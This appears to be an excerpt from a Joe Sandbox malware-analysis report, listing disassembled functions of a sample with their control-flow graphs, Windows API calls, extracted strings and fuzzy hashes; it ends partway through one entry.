                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                            • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                            • Opcode Fuzzy Hash: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                            • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58
                                                                            Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1150 40236f-40238e LoadLibraryA GetProcAddress 1151 402390-40239b GetNativeSystemInfo 1150->1151 1152 40239c-40239f 1150->1152
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                            • String ID: GetNativeSystemInfo$kernel32
                                                                            • API String ID: 2103483237-3846845290
                                                                            • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                            • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                            • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                            • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368
                                                                            Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1361 403387-40339e GetFileAttributesW 1362 4033a0-4033a2 1361->1362 1363 4033a4-4033a6 1361->1363 1364 4033fd-4033ff 1362->1364 1365 4033b5-4033bc 1363->1365 1366 4033a8-4033b3 SetLastError 1363->1366 1367 4033c7-4033ca 1365->1367 1368 4033be-4033c5 call 40335a 1365->1368 1366->1364 1369 4033fa-4033fc 1367->1369 1370 4033cc-4033dd FindFirstFileW 1367->1370 1368->1364 1369->1364 1370->1368 1372 4033df-4033f8 FindClose CompareFileTime 1370->1372 1372->1368 1372->1369
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                            • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 1799206407-0
                                                                            • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                            • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                            • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                            • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                            Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                            • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeMessageSendSpace
                                                                            • String ID:
                                                                            • API String ID: 696007252-0
                                                                            • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                            • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                            • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                            • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D
                                                                            Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 724 403400-403418 call 402823 727 4036a2-4036ae call 4025cd 724->727 730 4036b4-4036be ??3@YAXPAX@Z 727->730 731 40341d-403444 call 401458 * 2 call 402823 727->731 732 4036eb-4036f0 730->732 739 40345a-403466 call 401bbb 731->739 742 403446-403449 739->742 743 403468-40349a call 402ad8 call 4013a9 ??3@YAXPAX@Z * 2 739->743 742->743 744 40344b-403457 call 40292b 742->744 751 4036c0-4036c6 743->751 752 4034a0-4034af call 4025cd 743->752 744->739 754 4036ce-4036e9 call 402d30 call 40269a ??3@YAXPAX@Z 751->754 757 4034b5-4034be 752->757 758 4036c8-4036cb 752->758 754->732 757->758 760 4034c4-4034d1 call 4025cd 757->760 758->754 760->758 765 4034d7-4034e1 760->765 766 403501-403515 765->766 767 4034e3-4034e5 765->767 769 403593-4035a6 strncmp 766->769 767->758 768 4034eb-4034fc call 402662 767->768 778 40369a-40369d call 40269a 768->778 770 4035a8 769->770 771 40357e-403591 strncmp 769->771 774 4035cd-4035d4 770->774 771->769 773 403517-40351a 771->773 773->758 779 403520-40352f 773->779 776 4035d6-4035dc 774->776 777 4035aa-4035ad 774->777 780 4035e2-40360c call 402ad8 call 4013a9 ??3@YAXPAX@Z call 402dd6 776->780 784 4035de-4035df 776->784 777->776 783 4035af-4035b2 777->783 778->727 779->780 781 403535-403538 779->781 807 403611-403623 lstrcmpW 780->807 785 403573 781->785 786 40353a-403546 781->786 787 4035b4-4035b9 783->787 788 4035bc-4035c8 call 40292b 783->788 784->780 794 403576 785->794 790 403548-40354a 786->790 791 40356f-403571 786->791 787->788 792 4035bb 787->792 788->774 796 40356b-40356d 790->796 797 40354c-40354e 790->797 791->794 792->788 798 403579 call 40292b 794->798 796->794 801 403550-403555 797->801 802 403567-403569 797->802 798->771 805 403563-403565 801->805 806 403557-403561 call 40292b 801->806 802->794 805->798 806->794 809 403625-403633 call 40cc87 807->809 810 403639-403646 807->810 809->758 809->810 813 403648-403661 lstrlenW wcsncmp 810->813 814 40366e-40367f call 40261a 810->814 816 403663-403668 813->816 817 40366a-40366c 813->817 819 40368e-403695 call 4032d9 814->819 822 403681-40368c call 401370 814->822 816->813 816->817 817->814 817->819 819->778 822->778
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                            • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                              • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                              • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                            • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: 0VA$SetEnvironment${\rtf
                                                                            • API String ID: 613200358-2390373888
                                                                            • Opcode ID: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                            • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                            • Opcode Fuzzy Hash: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                            • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                                            Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 931 404f67-404fac call 401458 * 2 memset 936 404fb8-404fbc 931->936 937 404fae-404fb1 931->937 938 404fc5-404fdf call 404a97 call 401370 936->938 939 404fbe 936->939 937->936 944 404fe1-404fe9 ??3@YAXPAX@Z 938->944 945 404ffa-405012 ShellExecuteExW 938->945 939->938 946 404fec-404ff9 ??3@YAXPAX@Z 944->946 947 405014-40501b 945->947 948 40503a-40503c 945->948 949 405028-40502b CloseHandle 947->949 950 40501d-405022 WaitForSingleObject 947->950 951 405031-405038 ??3@YAXPAX@Z 948->951 949->951 950->949 951->946
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00404F8B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                            • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                            • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                            • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                            • String ID: $gA
                                                                            • API String ID: 2700081640-3949116232
                                                                            • Opcode ID: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                            • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                            • Opcode Fuzzy Hash: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                            • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58
                                                                            Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                            • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                            • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                            • DispatchMessageW.USER32(?), ref: 00401D73
                                                                            • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                            • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                            • String ID: Static
                                                                            • API String ID: 2479445380-2272013587
                                                                            • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                            • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                            • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                            • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9
                                                                            Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 955 4036f1-403717 lstrlenW call 402771 958 403722-40372e 955->958 959 403719-40371d call 401172 955->959 961 403730-403734 958->961 962 403736-40373c 958->962 959->958 961->962 963 40373f-403741 961->963 962->963 964 403765-40376e call 401b75 963->964 967 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 964->967 968 403754-403756 964->968 971 403785-403793 call 403387 967->971 972 40379c-4037a5 call 401b75 967->972 969 403743-40374b 968->969 970 403758-40375a 968->970 969->970 977 40374d-403751 969->977 973 403760 970->973 974 403814-40381a 970->974 971->972 985 403795-403797 971->985 986 4037b6-4037b8 972->986 987 4037a7-4037b4 call 408dbf 972->987 973->964 981 403844-403857 call 408dbf ??3@YAXPAX@Z 974->981 982 40381c-403827 974->982 977->970 978 403753 977->978 978->968 998 403859-40385d 981->998 982->981 983 403829-40382d 982->983 983->981 989 40382f-403834 983->989 993 403839-403842 ??3@YAXPAX@Z 985->993 990 403808-403812 ??3@YAXPAX@Z 986->990 991 4037ba-4037d9 memcpy 986->991 987->985 989->981 995 403836-403838 989->995 990->998 996 4037db 991->996 997 4037ee-4037f2 991->997 993->998 995->993 999 4037ed 996->999 1000 4037f4-403801 call 401b75 997->1000 1001 4037dd-4037e5 997->1001 999->997 1000->987 1005 403803-403806 1000->1005 1001->1000 1002 4037e7-4037eb 1001->1002 1002->999 1002->1000 1005->990 1005->991
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                              • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                              • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                            • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                            • String ID:
                                                                            • API String ID: 846840743-0
                                                                            • Opcode ID: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                            • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                            • Opcode Fuzzy Hash: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                            • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD
                                                                            Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1006 40f227-40f26f _EH_prolog call 40ef4a 1009 40f271-40f274 1006->1009 1010 40f277-40f27a 1006->1010 1009->1010 1011 40f290-40f2b5 1010->1011 1012 40f27c-40f281 1010->1012 1015 40f2b7-40f2bd 1011->1015 1013 40f283-40f285 1012->1013 1014 40f289-40f28b 1012->1014 1013->1014 1016 40f6f3-40f704 1014->1016 1017 40f2c3-40f2c7 1015->1017 1018 40f387-40f39a call 4011d1 1015->1018 1019 40f2c9-40f2cc 1017->1019 1020 40f2cf-40f2de 1017->1020 1026 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 1018->1026 1027 40f39c-40f3a6 call 40ef85 1018->1027 1019->1020 1022 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 1020->1022 1023 40f303-40f308 1020->1023 1043 40f2fb-40f301 1022->1043 1024 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 1023->1024 1025 40f30a-40f314 1023->1025 1029 40f353-40f369 1024->1029 1025->1024 1025->1029 1040 40f3e1-40f3fa call 40ef4a call 40dc14 1026->1040 1041 40f3d8-40f3df call 40dce7 1026->1041 1049 40f3aa-40f3ac 1027->1049 1037 40f36c-40f374 1029->1037 1042 40f376-40f385 call 40ef63 1037->1042 1037->1043 1059 40f3fd-40f420 call 40dc09 1040->1059 1041->1040 1042->1037 1043->1015 1049->1016 1063 40f422-40f427 1059->1063 1064 40f456-40f459 1059->1064 1067 40f429-40f42b 1063->1067 1068 40f42f-40f447 call 40f090 call 40ef85 1063->1068 1065 40f485-40f4a9 ??2@YAPAXI@Z 1064->1065 1066 40f45b-40f460 1064->1066 1072 40f4b4 1065->1072 1073 40f4ab-40f4b2 call 40f776 1065->1073 1069 40f462-40f464 1066->1069 1070 40f468-40f47e call 40f090 call 40ef85 1066->1070 1067->1068 1085 40f449-40f44b 1068->1085 1086 40f44f-40f451 1068->1086 1069->1070 1070->1065 1074 40f4b6-40f4cd call 40ef4a 1072->1074 1073->1074 1087 40f4db-40f500 call 40faff 1074->1087 1088 40f4cf-40f4d8 1074->1088 1085->1086 1086->1016 1092 40f502-40f507 1087->1092 1093 40f543-40f546 1087->1093 1088->1087 1096 40f509-40f50b 1092->1096 1097 40f50f-40f514 1092->1097 1094 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 1093->1094 1095 40f6ae-40f6b3 1093->1095 1113 40f5ae-40f5b3 1094->1113 1098 40f6b5-40f6b6 1095->1098 1099 40f6bb-40f6df 1095->1099 1096->1097 1101 40f516-40f518 1097->1101 1102 40f51c-40f534 call 40f090 call 40ef85 1097->1102 1098->1099 1099->1016 1099->1059 1101->1102 1111 40f536-40f538 1102->1111 1112 40f53c-40f53e 1102->1112 1111->1112 1112->1016 1114 40f615-40f61b 1113->1114 1115 40f5b5 1113->1115 1117 40f621-40f623 1114->1117 1118 40f61d-40f61f 1114->1118 1116 40f5b7 1115->1116 1119 40f5ba-40f5c3 call 40faac 1116->1119 1120 40f5c5-40f5c7 1117->1120 1121 40f625-40f631 1117->1121 1118->1116 1119->1120 1131 40f602-40f604 1119->1131 1123 40f5c9-40f5ca 1120->1123 1124 40f5cf-40f5d1 1120->1124 1125 40f633-40f635 1121->1125 1126 40f637-40f63d 1121->1126 1123->1124 1128 40f5d3-40f5d5 1124->1128 1129 40f5d9-40f5f1 call 40f090 call 40ef85 1124->1129 1125->1119 1126->1099 1130 40f63f-40f645 1126->1130 1128->1129 1129->1049 1139 40f5f7-40f5fd 1129->1139 1130->1099 1133 40f606-40f608 1131->1133 1134 40f60c-40f610 1131->1134 1133->1134 1134->1099 1139->1049
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040F230
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                              • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$H_prolog
                                                                            • String ID: pmA${D@
                                                                            • API String ID: 3431946709-901781089
                                                                            • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                            • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                            • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                            • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54
                                                                            Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1142 401b75-401b84 CreateDirectoryW 1143 401bb6-401bba 1142->1143 1144 401b86-401b93 GetLastError 1142->1144 1145 401ba0-401bad GetFileAttributesW 1144->1145 1146 401b95 1144->1146 1145->1143 1148 401baf-401bb1 1145->1148 1147 401b96-401b9f SetLastError 1146->1147 1148->1143 1149 401bb3-401bb4 1148->1149 1149->1147
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                            • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                            • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                            • String ID: k7@
                                                                            • API String ID: 635176117-1561861239
                                                                            • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                            • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                            • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                            • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549
                                                                            Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
